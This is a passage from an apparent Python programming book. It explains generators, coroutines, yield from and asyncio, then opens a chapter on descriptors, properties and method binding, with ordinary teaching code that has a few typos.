batch_sz = 25 try: while True: batch_sz = (yield fetched_data) or batch_sz fetched_data = db_conn.fetch_records(batch_sz) except GeneratorExit: db_conn.close() >>> datagen = fetch_db_data(DBConnection("sampledStats")) >>> result = datagen.send(5) >>> len(result) 5

Can coroutines return values?

Coroutines differ from other regular iterators in the purpose for which they are used. Rather than being used for iteration, coroutines were conceptualized for providing an ability to suspend the code execution for a delayed wakeup. It provides a hibernation ability for the executing code.

While designing an efficient co-routine, one needs to focus more on the state suspension instead of the iteration. It can be a bit confusing to grasp at first since coroutines have their foundation in generators in Python. Thus, the core functionality of the coroutine would be to process information and then suspend the state of execution – you could think of them as lightweight threads (check out green threads that are scheduled by a run time library or VM instead of the OS). So, how about making them return values, similar to other methods, to enhance their usability?

Generators are very different from functions with respect to returning values. When we run data = it simply creates the generator and no processing is done. So, where will the value be returned? In case of generators, the return is only possible after the iteration stops – once the StopIteration exception has been raised. What we do is store the value to be returned inside the Exception object. When the caller catches it, they get the return value. Let us illustrate this with an example to make it clearer:

In [1]: def myGenerator(): …:      yield 101 …:      yield 102 …:      yield 103

…:      return 3000 …:

In [2]: datagen = myGenerator() In [3]: next(datagen) Out[3]: 101 In [4]: next(datagen) Out[4]: 102 In [5]: next(datagen) Out[5]: 103 In [8]: try: …:     next(datagen) …: except StopIteration as e: …:     print("The returned value is ", e.value) …: The returned value is 3000

The preceding lean generator yields three values and returns one value. In order to access the return the user has to explicitly catch the exception. Another thing to note is that the value is precisely recorded under the attribute with the name

Where do we use yield from?

The newly introduced yield from the construct helps to chain the generators from the nested for-loops combined into a single one. The return value would be a string of values in a continuous stream.

Let us understand this with a simple example. The itertool.chain() library method takes in variable number of iterables and generates a single stream out of them. A simple implementation would look like the following:

def chain(*iterArgs): for iterable in iterArgs: for data in iterable: yield data

That is simple to understand – iterate through the iterables one at a time. The yield from construct can be used to directly generate the values from the coroutine, thereby resulting in a simpler code:

def chain(*iterArgs): for iterable in iterArgs: yield from iterable

In [1]: list(chain("string", ["liststr"], ("tuple", " of ", "strings.")))

Out[1]:['s', 't', 'i', 'n', 'g', 'liststr', 'tuple', ' of ', 'strings.']

Note that the yield from construct works with any iterable, including the generator expressions.

We can now use this with a more practical example. Let us consider a case of a classic selection problem. Most selection problems in statistics rely on the computing powers. If given a (n, k), if we need to write code to generate all the sequences of n^0, n^1 … n^k, using the preceding concepts, it would look like the following: def generate_all_pows(n, k): yield from (n ** i for i in range(k + 1)) This seems more like an aesthetic upliftment of the code, which is important as well.

Another case of capturing returned value of generators

We have seen earlier that the return value in a generator can be stored in the Exception object and retrieved by handling the exception. Take an example of what happens when we have nested generators. Let each of the nested generators be equipped with a return value. Now, when we invoke the top level generator, how will the return values of all the constituent generators be effectively returned using the yield from construct? Take a look at the following: def series(identifier, begin, end): print("%s initiated at %i", identifier, begin) yield from range(begin, end) print("%s terminated at %i", identifier, end) return end

def supergen(): data_generator_one = yield from series("series1", 1, 6) data_generator_two = yield from series( "series2", data_generator_one, 10) return data_generator_one + data_generator_two Note that return values from one generator are being used in the second generator in the sequence. If we were to now execute this script using the supergen top-level generator, the result would be as follows:

>>> mySuperGen = supergen() >>> next(mySuperGen) series1 initiated at 1 1

>>> next(mySuperGen)

2

>>> next(mySuperGen) 3

>>> next(mySuperGen) 4

>>> next(mySuperGen) 5

>>> next(mySuperGen) series1 terminated at 6 series2 initiated at 6 6 >>> next(mySuperGen) 7 >>> next(mySuperGen) 8

>>> next(mySuperGen) 9 >>> next(mySuperGen) series2 terminated at 10 Traceback (most recent call last): File "", line 1, in StopIteration: 16

The yield from construct can thereby also be used for capturing the final value from the executed coroutine once it completes.

Hope that made the concepts of returning values clearer.

Another case of sending and receiving values from generators

We have also discussed the use of the send() method for injecting parameters to an active generator. Now we will look at how we can use the yield from construct to send and receive the values to and from the coroutine.

For an example here, let us consider a coroutine, which is delegating to other coroutines similar to the previous section example, also preserving the logic to send values and raising the appropriate exceptions for it. This would be a seemingly complex operation. In the example, let’s keep the supergen() method intact as the previous example, however, we will be modifying the series() generator to be able to receive parametric values and handle exceptions. The illustrative code would look something like the following:

def series(identifier, begin, end): result = begin print("%s initiated at %i", identifier, begin) while result < end: try: rev_val = yield result print("%s received %r", identifier, rec_val) result = result + 1 except SpecificException as ex: print("%s is exception handling - %s", identifier, ex) rec_val = yield "DONE"

return end

Let us execute the supergen() coroutine while also passing in the arguments, and see how the result and exceptions behave while resulting in the series:

>>> mySuperGen = supergen() >>> next(mySuperGen) series1 initiated at 0 0

>>> next(mySuperGen) series1 received None 1 >>> mySuperGen.send("A Random Value") series1 received 'A Random Value' 2

>>> mySuperGen.throw(SpecificException("A Random Exception")) series1 is exception handling - A Random Exception 'DONE'

… # advance more times using next() or send() series2 initiated at 5 5 >>> mySuperGen.throw(SpecificException("Another Random Exception")) series2 is exception handling - Another Random Exception

'DONE'

One thing to note here is that we are ONLY sending the parametric values to and NEVER to However, the nested series generators are still receiving the values. This is because they are being passed along by the yield from construct.

A little insight here – when the main coroutine generates its values, it will be suspended in one of the two subroutines at any given time. The one that is recently suspended handles the sent values and exceptions. When the first coroutine completes, its return value is passed to the second coroutine as an input. At any step, the send() call returns the value that the currently suspended coroutine has produced. When a handled exception is thrown, the series() returns the value DONE which is propagated to the calling supergen() object.

Asynchronous programming

An asynchronous program runs in a single thread of execution. There is context switch taking place between the different sections of code, which we can control. In other words, you can save the state of memory and data in an atomic fashion before making a context switch.

With all the constructs we have learnt uptil now, you can see that several coroutines can be scheduled for execution in a specific order, and they can switch between these coroutines, once they are suspended, post the invocation of a yield on each of them.

The I/O operations can be parallelized in a non-blocking manner. You require a generator for handling the actual I/O in the time the coroutine remains suspended. The program can retrieve back control on the coroutine with the help of the yield statement that suspends and produces a value to the caller. However, the syntax of achieving this has evolved over time in Python. Coroutines and generators may fundamentally be the same, but they differ semantically.

Generators are created for efficient iterations, while coroutines are usually created for achieving non-blocking I/O operations.

When you have multiple coroutines, using the yield from keyword can result in multiple use cases, and we can write something like the following:

result = yield from iterable_or_awaitable()

It is not clear what is returned from It could be a simple string iterable, or, it might be an actual coroutine. This could lead to complications later.

The typing system in Python was extended – before Python 3.5, coroutines were just generators with a @coroutine decorator applied, and they were to be called with the yield from syntax. Now, coroutine is a specific type of object. This required some syntax changes as well – the await and async def syntax was introduced. The await construct is used in place of the yield from statement and with ‘awaitables’ like coroutines. The async def construct is a new mechanism of defining coroutines, where instead of using the old decorator, we can create an object which will result in a coroutine on instantiation. This is still fundamentally in line with all that we have studied in this chapter. For an asynchronous program, we need an event loop (the asyncio standard library is the preferred option), which helps to manage a series of coroutines. The event loop possesses

its own scheduling mechanism that will accordingly invoke the constituent coroutines. Giving back control to the event loop is achieved with the await for asynchronous processing. This will resume the coroutine, and a different coroutine will execute in the meantime.

Say for example, you have sent an HTTP request and are waiting for the response. You can use the preceding async coroutines to continue with the execution of other sections of the program while waiting for the HTTP response. Let us take another example of a program with multiple coroutines which illustrate the use of the asyncio module for achieving async execution:

import asyncio async def summation(begin,end,wait):

result = 0 for i in range(begin,end): result += i

# Wait for assigned seconds await asyncio.sleep(wait) print(f 'Summation from {begin} to {end} is {result}') async def async_main(): task_one = loop.create_task(summation(5,500000,3)) task_two = loop.create_task(summation(2,300000,2))

task_three = loop.create_task(summation(10,1000,1)) # Run the tasks asynchronously await asyncio.wait([task_one, task_two, task_three]) if __name__ == '__main__': # Declare event loop loop = asyncio.get_event_loop() # Run the code until completing all task loop.run_until_complete(async_main()) loop.close() If we now execute the preceding code in a script, we notice that task_three is completed first since the waiting time was least. >>> python test.py Summation from 10 to 1000 is 499455 Summation from 2 to 300000 is 44999849999 Summation from 5 to 500000 is 124999749990 Thus, we see that generators demonstrate a core concept of the modern Python language, as there are several other programming constructs built on top of them. We will be looking at more asynchronous programming in detail in the later chapters.

Looping Gotchas

Loops are the simplest constructs you have been encountering in every programming language until now. In Python, when working on critical production worthy code, there are several trivia about the Pythonic loops and iterators that you absolutely need to keep in mind. Some of them are discussed in this section.

Exhausting an iterator

Consider a list of integers and a corresponding generator whose function is to square each integer in the list.

>>> integers = [1, 2, 3, 5, 7, 8, 9, 10] >>> sq_integers = (x**2 for x in integers)

If you apply the list constructor to this, a list of all the squares of the numbers will be returned:

>>> integers = [1, 2, 3, 5, 7, 8, 9, 10] >>> sq_integers = (x**2 for x in integers) >>> list(sq_integers) [1, 4, 9, 25, 49, 64, 81, 100]

If now, you want to see the sum of these squares that are being computed, we can try to apply the sum() method. We would be expecting a sum of however if you execute this, the interpreter returns a value of

>>> sum(sq_integers) 0 This happens because a generator is a single-use-only construct, and we have exhausted it while creating the list object from it. If

you try it again, the result is empty.

>>> list(sq_integers) []

Generators are iterators…and iterators are single-use-only iterables. They’re like toothpaste tubes that cannot be reloaded.

Partially consuming an iterator

You also need to be aware of unwarranted partial uses of generators in checks and conditions. These are very difficult to debug as far as logical errors go.

Let us consider the previous example of the integers and squares to illustrate the following: >>> integers = [1, 2, 3, 5, 7, 8, 9, 10] >>> sq_integers = (x**2 for x in integers)

Now, if you have conditionals in your code that checks for, say, the existence of a particular square value in the squares list, Python will give you a positive response. However, if the same query is executed again, Python will return that it does not exist.

>>> 25 in sq_integers True

Asking the same question results in a >>> 25 in sq_integers False

In order to check the existence in the generator, Python loops from the first elements until it find the required element or the generator is exhausted. The next query will begin from where the first query stopped in case of partial execution.

>>> integers = [1, 2, 3, 5, 7, 8, 9, 10] >>> sq_integers = (x**2 for x in inetgers) >>> 25 in sq_integers True

>>> tuple(sq_integers) (49, 64, 81, 100)

Querying for the existence of an element in the iterator will partially consume the iterator. Since they are dynamically generated, you have to be careful of how you treat conditionals and existence on the iterator elements.

Unpacking is also an iteration

Consider a dictionary which has the following key-value pairs. If we now try to loop over the entities, this will result in only the keys being printed:

>>> fruits = {'mangoes': 12, 'bananas': 21} >>> for fruit in fruits: …     print(fruit) … mangoes bananas

You can also extract the data using the unpacking technique in Python using multiple assignment:

>>> a, b = fruits >>> a, b ('mangoes', 'bananas')

Many novice programmers think that logically unpacking could return key-value pairs or an exception. However, the result is same as before – only the keys of the dictionary are returned. >>> a 'mangoes'

All loops in Python rely on the iterator protocol. It is the same case for unpacking values, which also makes use of the iterator protocol. Therefore, unpacking a dictionary is nothing but looping over the data structure.

Conclusion

Generators are strewn all over Python and are a core component in the paradigm that makes efficient and simpler programs.

With time, we started using and relying on generators for more complex tasks, and supporting coroutines was one of them. While coroutines were built on generators, they are semantically different – while generators exist for creating performant iteration mechanisms, coroutines mainly exist to provide a robust mechanism of async operations in programs. The criticality of this distinction has made later versions of Python to evolve the coroutine type to full-fledged objects.

Iteration and async programs are one of the key building blocks of core Python programming. In the next chapter, we will take a look at what descriptors in Python are, and how to make efficient use of descriptors in Python code.

Key takeaways

Sequences start with an index of zero, have a fixed length and can be sliced. Lists, Tuples, and Strings are Sequence Iterables in Python.

Iterators are dynamic objects and they do not have a pre-defined length, thereby you cannot index an iterator. Iterators return their own instance back when you call on them with the iter() method. In addition, iterators, by themselves, are also iterables, although they lack the extensive features that iterables have.

Not all iterables are iterators, but all iterators are iterables.

An alias for the next() method needs to be created which automatically redirects to the __next__ method. This will make your code independent of Python versions.

When you need more complexity and modularity in your iterators, choose the class based implementation to create iterators; if you need to pass in arguments, simply use generator functions, else generator expressions should suffice.

Prefer generator expressions to list comprehensions for simple iterations.

Use the close() method on generators for performing finish-up tasks when needed.

The usage of send() is how coroutines differ from regular generators, since now the yield keyword is used in the RHS of the expression, and the yielded value is stored in a variable or an object.

You cannot use the send() method on the first invocation of the generator. You have to use next() at least once to be able to send values to it using the method. Note that the yield from construct works with any iterable, including generator expressions. The yield from construct can thereby also be used for capturing the final value from the executed coroutine, once it completes. Generator based iterators are single-use-only. Be mindful of their complete or partial usage in the code.

Further reading

David Beazley: Generators: The Final PyCon 2014. PEP-0342,

Tarek Ziadé, Python Microservices

Dimitri Racordon, Coroutines with Higher Order Michael Spivey, Faster Coroutine

CHAPTER 8 Python Descriptors

“If you are offered a seat on a rocket ship, don’t ask what seat.”

— Sheryl Sandberg

Python descriptors help to get, set, and delete attributes from an object’s dictionary. When you access the class attribute, this starts the lookup chain. If the descriptor methods are defined in code, then the descriptor method will be invoked to look up the attributes. These descriptor methods are and __delete__ in Python.

In practical terms, when you assign or get a specific attribute value from a class instance, you might want to do some extra processing before setting the value of an attribute or while getting a value of the attributes. Python descriptors help you do those validation or extra operations without calling any specific method.

Structure

The key topics that we will be touching upon in this chapter include the following:

Types of descriptors – data and non-data.

Descriptor chains and accessing attributes. Descriptor objects and how Python internally uses them.

Best Practices for using descriptors.

Benefits and use cases for Python descriptors.

Objectives

This chapter introduces a concept that is more advanced in Python development – descriptors. Moreover, descriptors are not something that the programmers of other languages are familiar with, so there are no easy analogies or parallelisms to make. Descriptors are another distinctive feature of Python that takes object-oriented programming to a new level, and their potential allows users to build more powerful and reusable abstractions. Most of the time, the full potential of descriptors is observed in standard libraries or frameworks that use them.

By the end of this chapter, you will be able to do the following:

Understand what descriptors are, how they work, and how to implement them effectively.

Analyze the two types of descriptors in term of their conceptual differences and implementation details.

Learn how to write compact and clean Python code that is reusable and avoids duplicates. Analyze the examples of good uses of descriptors within the Python language, and how to take advantage of them for creating our own library or API.

Python descriptors

Python objects which implement the methods of the Descriptor Protocol are referred to as descriptors. These descriptors provide the ability for creating objects that demonstrate special behaviour when invoked as attributes of other objects.

The descriptor protocol is constituted of the following method definitions: __get__(self, obj, type=None) -> object

__set__(self, obj, value) -> None

__delete__(self, obj) -> None

__set_name__(self, owner, name)

We also differentiate between the type of descriptors based on which methods of the descriptor protocol they implement – if the descriptor only implements the __get__() method, we call it a non-data descriptor, however, if the __set__() or __delete__() method is implemented, it is referred to as a data descriptor. The difference is in the behaviour of the two types, and the data descriptor enjoys precedence over the non-data descriptors. We will look into these aspects in detail later in the chapter.

Let’s take an example of a logger defined using a descriptor:

class print_attr(): def __get__(self, obj, type=None) -> object: print("retrieving value by accessing the attribute") return 45

def __set__(self, obj, value) -> None: print("setting the value by accessing the attribute") raise AttributeError("Value could not be changed")

class Demo(): myAttr = print_attr()

>>> demo_obj = Demo() >>> var = demo_obj.myAttr print(var) Here, we have implemented the descriptor protocol for the print_attr class. When we instantiate this for an attribute of the Demo class, its behaviour as a descriptor is realized. The program binds the behaviour of the attribute to the dot notations, and whenever it is accessed, the __get__ method is automatically invoked and a message is logged to the console.

When the access invokes method, it is configured to return a constant value here –

When the access invokes the .__set__() method, an attributeError exception is raised, which is how we define a descriptor to behave in a read-only manner.

When we try running the preceding code in a script, we find that simply accessing the attribute invokes the getter in the descriptor.

>>> python descriptors.py accessing the attribute to get the value 45

Descriptor types

Depending upon how the descriptors work, we can clearly demarcate the types of descriptors into data and non-data descriptors. As discussed earlier, if the descriptor implements the __delete__ or __set__ methods, it is referred to as a data descriptor, and if it only implements the __get__ method, we call it a non-data descriptor. The __set_name__ method has no impact on this categorisation. In terms of precedence, when you are resolving which attribute implementation to invoke, the data descriptors will have precedence over the object dictionary, while the non-data descriptors will be the other way round. In other words, for the non-data descriptor, if the name clashes with another key in the object dictionary, the descriptor will never be invoked.

Let us look into the intricacies of these in more detail in the following sections for each type of descriptor.

Non-data descriptors

Consider the usage of a descriptor that only implements the __get__ method:

class NonDataDescriptor: def __get__(self, instance, owner): if instance is None: return self return 45 class ClientClass: desc = NonDataDescriptor()

Therefore, when the attribute is accessed, the __get__ method is invoked and the results are returned:

>>> myObj = ClientClass() >>> myObj.desc 45

Now, let us see how the precedence of this works. If we now try to set the value of this attribute and then try to access it, the descriptor will no longer be called. This is because a new key has been added to the object dictionary with the same name, and that takes precedence over the descriptor.

>>> myObj.desc = 25 >>> myObj.desc 25

To ascertain this fact even better, let us manually delete the descriptor from the object dictionary and try accessing it again:

>>> del myObj.desc >>> myObj.desc 45

In addition, the descriptor is back in action. At any point, you can check for whether the object dictionary has a key with the same name to assess the precedence, using the following: >>> vars(myObj) {} >>> myObj.desc = 25 >>> vars(myObj) {'desc': 25} When the del keyword was used, it cleared out the desc property key from the object dictionary, thereby defaulting to the defined descriptor.

Therefore, the non-data descriptors are read-only in nature. If you try to set a value to it, the descriptor protocol becomes inactive and the feature will be broken. In order to suit your use case, you can enhance the functionality by defining a data descriptor, which can update the return value during execution by implementing the __set __ magic method.

Data descriptors

Consider a descriptor that now implements the __set__ method and let us look at what happens to the precedence during runtime.

class DataDescriptor: def __get__(self, instance, owner): if instance is None: return self return 45

def __set__(self, instance, value): print("%s.descriptor set to %s", instance, value) instance.__dict__["desc"] = value

class ClientClass: desc = DataDescriptor()

If you instantiate this class and try to access the object, the following happens:

>>> myObj = ClientClass() >>> myObj.desc 45

What happens if you try to change the value to a different integer –

>>> myObj.desc = 22 >>> myObj.desc 45

If we dig deeper, we will notice that the value itself did not change, but the object dictionary was updated with the assigned value:

>>> vars(myObj) {'desc': 22}

>>> myObj.__dict__["desc"] 22

The __set__ method seems to have done its job. However, in this case, we are using the data descriptor that takes higher precedence than the object dictionary. Therefore, we still get the old value on accessing the attribute. In addition, it is important to note that deletion of the attribute, like in the previous case, is not possible since the reference of the attribute still resides in the descriptor that does not support __delete__ yet, hence the AttributeError is raised. >>> del myObj.desc Traceback (most recent call last):

… AttributeError: __delete__ So, hoping that now the usage of the data and the non-data descriptors is clear in your mind. Another interesting fact that we notice is the way the __set__ method is setting the value:

myObj.__dict__["desc"] = value One question that would come to our mind if you really think about it – how did we know that we need to change the key called desc in the dictionary before it was even defined? Well, this was for illustration purposes only. In a real production scenario, you could do the following: Take the name of the parameter as an argument and store it in the init() method, so only the internal attribute is used. Or, this is where you get to use the __set_name__ method.

Another observation might be that we are accessing the __dict__ attribute in a direct and risky manner – wouldn’t doing something like the following be better?

setattr(instance, "desc", value) The reason you can’t do that is because calling the setattr() method internally calls the __set__ method, which would then

again call the setattr() and we would have an infinite recursive loop. Another option would be to keep the references to the client object in the descriptor – however, since the client class already has a reference to the descriptor, this would result in a circular dependency and thereby no garbage collection will ever take place on this (reference counts never drop). One possible way to resolve this is to make use of the weak references, which are handled with the weakref module in Python – this will create a weak reference key dictionary of the attributes.

The lookup chain and attribute access

In this section, we will dive a little deep into what happens when an attribute is accessed in Python. We know that each Python object has a __dict__ attribute built-in, which houses all the attributes of the objects. Let us look at this with the help of the following example:

class Animal(): can_fly = False num_legs = 0

class Giraffe(Animal): num_legs = 4

def __init__(self, name): self.name = name

my_pet = Giraffe("Jerry") print(my_pet.__dict__) print(type(my_pet).__dict__)

A new object is created and the __dict__ contents are printed to the console for the class and object. When we run the script, the following is what happens:

{'name': 'Jerry'} {'__module__': '__main__', 'num_legs': 4, '__init__': Giraffe.__init__ at 0x000002054C5C00D0>, '__doc__': None}

Do note that everything in Python is an object type. Even a class is actually an object, so it also possesses a __dict__ attribute that contains all the attributes and methods of the class.

Now, we will look at what happens internally when an attribute is accessed, with the help of the previous example:

# lookup.py class Animal(object): can_fly = False num_legs = 0

class Dog(Animal): num_legs = 4

def __init__(self, name): self.name = name my_pet = Dog("Enzo")

print(my_pet.name) print(my_pet.num_legs)

print(my_pet.can_fly)

By running this piece of code, we would try to access and print the class and object attributes:

>>> python lookup.py Enzo 4 False The accesses in the three different prints are of the following different types: The name attribute of the my_pet object, the __dict__ of the my_car object is accessed to retrieve the value. The num_legs attribute is accessed on the my_pet object, the __dict__ of the Dog class is used to return the value. The can_fly attribute when accessed through the my_pet object, the __dict__ attribute of the Animal class is accessed. This means that it is possible to rewrite the preceding example like the following:

# lookup.py class Animal(): can_fly = False

num_legs = 0 class Dog(Animal): num_legs = 4 def __init__(self, name): self.name = name my_pet = Dog("Enzo") print(my_pet.__dict__['name']) print(type(my_pet).__dict__['num_legs']) print(type(my_pet).__base__.__dict__['can_fly']) When you test this new example, you should get the same result: >>> python lookup.py Enzo 4 False Therefore, the question arises as to how the interpreter decides which attribute to pick up. This is where the concept of the lookup chain comes into the picture:

In order of precedence, the first result is retrieved from the __get__ method which is part of the data descriptor for the searched attribute.

Next, the key is searched for in the __dict__ of the object being used, and if found, the value is returned. If that is unsuccessful, then the __get__ method of the attribute’s corresponding non-data descriptor returns the value.

When that fails, then the attribute key is searched from the object type’s __dict__ attribute, and a value is returned if it exists. Upon the failure of the preceding step, the parent object type’s __dict__ is searched for the key and the value is returned if it exists. The preceding step happens for every parent type in the MRO Resolution hierarchy until all have been covered or a value has been found.

If nothing worked, an AttributeError exception is raised. This shows the significance of classifying the descriptor as data or non-data descriptors. Being present of different ranks in the lookup chain, they can affect the program behavior in different ways.

Descriptor objects and Python internals

For the seasoned object oriented developers moving to Python, the examples discussed earlier for descriptors might seem to be an overdo – you could argue that the same feature can be achieved with the help of properties. This is definitely a viable option; however, in Python, properties are nothing but descriptors. In the following sections, we will be looking into several other uses of descriptors in Python.

Property objects are data descriptors

As discussed earlier, another direct approach to achieving the same results without explicitly defining the descriptor is to use a property. This is achieved through the property decorator. The following example for logging a property access demonstrates the use:

class Demo(): @property def attr_one(self ) -> object: print("Getting the value from property") return 45

@attr_one.setter def attr_one(self, value) -> None: print("Setting the value for the attribute") raise AttributeError("RO: Value change not allowed.")

myObj = Demo() result = myObj.attr_one print(result) Here, we make use of decorators to create the property. However, decorators are simply syntactic sugar. This example can also be written without using the decorators explicitly and simply using functions instead:

# prop_fun.py class Demo(): def get(self ) -> object: print("Getting the value from the attribute") return 45

def set(self, value) -> None: print("Setting the value for the attribute")

raise AttributeError("RO: Value change not allowed.")

attr_one = property(get, set) myObj = Demo() result = myObj.attr_one print(result)

This time we ditch the decorator for creating the property, and use the property() function, whose signature looks like the following: property(fget=None, fset=None, fdel=None, doc=None) -> object The property() method results in a descriptor protocol implementing descriptor object. The and fdel parameters are used to internally create the implementations of the and __delete__ methods.

Creating a cached property with descriptors

A property whose value is only computed if it has not already been computed before is referred to as a cached property. Once computed, the result should be persisted or cached, for faster retrievals in the subsequent access requests.

class CachedProperty: def __init__(self, func): self.func = func def __get__(self, instance, owner): func_result = self.func(instance) instance.__dict__[self.func.__name__] = func_result return func_result

Let us see this CachedProperty decorator in action:

class Demo: def get_value(self ): print('Using the method to compute the value!') return 84 value = CachedProperty(get_value) # NOTE: You can use it as a decorator too!!

>>> demo = Demo() >>> vars(demo) {}

>>> demo.value Using the method to compute the value! 84

>>> vars(demo) {'get_value': 84}

>>> demo.value 84

Note from the results that only the first access of the property calls the get_value method to retrieve the value. Post that, the vars, i.e. the contents of the __dict__ is updated with the value and any subsequent calls retrieve the value from this property dict. So, what caused this behaviour? Let us fallback to the attribute access mechanism for what happened when it was accessed for the very first time: First, it was checked for whether the value was a data descriptor – The __dict__ of the Demo class and its hierarchy was searched for the value keyword –

Next came the check for non-data descriptor – which caused the function to cache and return the value. The next time, we try to access the value in the same order the __dict__ of the class generates a hit for the cached value, which is then returned directly.

The cached properties are extensively used in the Django library, and comes with a built-in implementation with django.utils.functional.cached_property from the library. One use case of this being particularly useful is creating properties that use time-consuming queries or computations to get their values.

Python descriptors in methods and functions

No matter where you started with object-oriented programming, you surely know what methods are. Methods are simply functions that have the first argument as a reference to the object (or self). While accessing methods with the object and the ‘dot’ notation, you call the function and provide the object reference as the first argument. What you need to know in case of Python is that we use a __get__() implementation of the function object which is a non-data descriptor. This helps in the transformation of obj.method(*args) to method(instance, This might seem confusing at first, but take a look at how this works with the help of an example from Python’s documentation:

import types

class Function(object): … def __get__(self, obj, objtype=None): """Simulate func_descr_get() in Objects/funcobject.c""" if obj is None: return self return types.MethodType(self, obj) Thus, a bound method is returned when the function is accessed and the __get__() method is invoked.

The same happens for instance methods, class methods, or even static methods. If you invoke a static method with an automatic transformation takes place to get Similarly, when a class method of the form obj.method(type(obj), *args) is invoked, an automatic transformation occurs in the form of method(type(obj),

The Python documentation also refers to some samples of cases describing how the static and class methods would have been implemented if they were in pure Python rather than C. An example of a static method implementation would be as follows: class StaticMethod(object): """Emulate PyStaticMethod_Type() in Objects/funcobject.c"""

def __init__(self, f ): self.f = f

def __get__(self, obj, objtype=None): return self.f Similarly, a possible Python implementation of a class method would be as follows: class ClassMethod(object): """Emulate PyClassMethod_Type() in Objects/funcobject.c"""

def __init__(self, f ): self.f = f def __get__(self, obj, klass=None): if klass is None: klass = type(obj) def newfunc(*args): return self.f(klass, *args) return newfunc We will dive into this feature in more details later in this chapter.

In Python, the class methods are just static methods that take in the reference to the class as the first argument of the parameter list.

Writable data attributes

Sometimes, we might need to have modifiable properties, where deletion (using del or updation (using myObj.property = can be implemented by passing the getter and setter function objects to the constructor as arguments. These functions will be stored and executed when the attribute is updated with the __set__ or __delete__ methods as discussed earlier. The following code illustrates the concept: class System(): def __init__(self ): self._os = None

def get_os(self ): return self._os

def set_os(self, os): if 'RHEL' not in os: raise AttributeError('We only support RHEL 7 and above') self._os = os print('{} installation complete!'.format(os)) os = property(get_os, set_os)

>>> server = System() >>> server.os = 'MacOS X'

… AttributeError: We only support RHEL 7 and above

>>> server.os = 'RHEL 8' RHEL 8 installation complete!

This uses a class attribute but works fine as a solution. However, since modifiable properties cannot be created with only the @property decorator, we will be defining a custom Property class to chart out all the setter and delete functions which can then be used as decorators: class Property(): def getter(self, fget): return type(self )(fget, self.fset, self.fdel, self.__doc__)

def setter(self, fset): return type(self )(self.fget, fset, self.fdel, self.__doc__)

def deleter(self, fdel): return type(self )(self.fget, self.fset, fdel, self.__doc__) Now, you can use this class to achieve the following functionalities: class System(): def __init__(self ): self._os = None

@property def os(self ): return self._os

@os.setter def os(self, os): if 'RHEL' not in os: raise AttributeError('We only support RHEL 7 and above') self._os = os print('{} installation complete!'.format(os)) This is a neater version of the previous implementation. The methods in the Property class act as decorators here – and what is it that they decorate? They wrap self – the property object reference.

Take the example of the setter decorator – it takes in the fset decorated method as a parameter and uses the constructor to create a new property object. The functions that are not passed as arguments – fget and del are also propagated to the new object. There you see the functional beauty of decorators – taking in an object, adding some functionality to it before returning it.

How Python uses descriptors internally

After all this, what do you think constitutes a good descriptor? It is simple, a Pythonic object. We believe that having a proper understanding of how Python internally uses descriptors will create an outlook for writing good descriptor implementations. In this section, we will dive into the common cases where the Python language makes use of descriptors for handling simple and complex internal logic, and some elegant descriptors that we have been unknowingly using in our day-to-day code.

Functions and methods

As discussed earlier, the most common use case for descriptors is when a function defined in the class has to be transformed to a method, it implements the __get__ method. Methods are functions whose first argument is self – an object reference to the class itself. Let us take a more in-depth illustration of this concept.

Consider a situation where we are defining something like the following: class DemoClass: def demo_method(self, …): self.val = 10

This definition is also equivalent to the following:

class DemoClass: pass

def demo_method(demoClassObj, …): demoClassObj.val = 10 method(DemoClass())

The simple difference is that the function now is created within the class itself and is bound to the object, when the method is

called like the following:

myObj = DemoClass() myObj.demo_method(…)

What Python is essentially doing is something like this:

myObj = DemoClass() DemoClass.method(myObj, …)

Therefore, this is simply a syntactic conversion that Python internally takes care of. The way this is achieved is with the help of descriptors. Since the descriptor protocol is enabled before the method call, it invokes the __get__() method where some transformations take place on the internal callable: >>> def function(): pass … >>> function.__get__ '__get__' of function object at 0x…> Let us take this one step at a time. When an instance.method(…) statement is encountered, the first step is to resolve the instance.method part. For this, the __get__ method of the corresponding method object attribute) is called, which binds the object with the callable.

The internal operations in Python will be clearer with the help of an example. Let us define a callable as a class member that can act as a function or an externally invocable method. We should then be able to use an instance of this class as a method or function in another class. Refer to the following snippet:

class Functor: def __init__(self, callsign): self.callsign = callsign def __call__(self, myObject, param1, param2): print(f "{self.callsign}: {myObject} invoked with {param1} and {param2}") class Demo: myFunc = Functor("Calling Internally") One thing to note here is that the __call__() method’s self parameter is an instance of the Functor class, and not the calling Demo class. The myObject argument is supposed to be an object of the Demo type. Now, from what we have discussed, the call to the object of the class as well as invocation of the method should be equivalent:

In [4]: myObject = Demo() In [5]: Functor("Calling Externally")(myObject, "Argument1", "Argument2")

Calling Externally: invoked with Argument1 and Argument2 In [7]: myObject.myFunc("Argument1", "Argument2") ------------------------------------------------------------------TypeError                         Traceback (most recent call last) in ----> 1 myObject.myFunc("Argument1", "Argument2") TypeError: __call__() missing 1 required positional argument: 'param2' However, we only see the first one working, while the second option raises an argument. This error arises since the arguments do not assume the correct positions. The self is not respected here, and all the parameters get shifted. For fixing this issue, the Functor class has to be made into a descriptor. What that will do is, on invocation of the we will be invoking the __get__() method, on which the callable is bound to the object – the first parameter will thereby be bypassed. This will now look like the following: from types import MethodType class Functor: def __init__(self, callsign): self.callsign = callsign def __call__(self, myObject, param1, param2): print(f "{self.callsign}: {myObject} invoked with {param1} and {param2}")

def __get__(self, myObject, owner): if myObject is None: return self return MethodType(self, myObject) If you now execute the invocations in the two forms as discussed earlier, the results are the same as expected: >>> myObject = Demo() >>> Functor("Calling Externally")(myObject, "Argument1", "Argument2") Calling Externally: invoked with Argument1 and Argument2 >>> myObject.myFunc("Argument1", "Argument2") Calling Internally: invoked with Argument1 and Argument2 So, what just happened? The trick here was to transform the callable class object into a method with the help of MethodType from the types module. Note that the first parameter in the signature should be a callable, which in this case is self – reference to itself since it implements the __call__ definition. The second parameter is the object to which this callable or function needs to be bound. This is similar to what Python’s function objects make use of, enabling them to work as methods, despite being defined within a class.

This is an elegant and Pythonic way of defining callable objects. While defining a callable, remember that if you make it a descriptor, you can use them in classes and class attributes.

Built-in decorators for methods

Several decorators in the Python core library, as per the official documentations, have been created with the help of descriptors. Some of the common ones that you frequently might be using include and

What we have seen from the previous sections is that when you call a descriptor directly from the class, it returns itself. The properties in Python are actually descriptors, so when we query it from the class, the property object will be returned, rather than their computed values.

>>> class Demo: …  @property …  def myProperty(self ): …   pass … >>> Demo.myProperty object at 0x…>

Remember, when it comes to class methods, the descriptor’s __get__ function will ensure that the first parameter will be a reference to the class, irrespective of whether it was called from an object or directly from the class. In the case of static methods, the binding established by __get__() for the functions

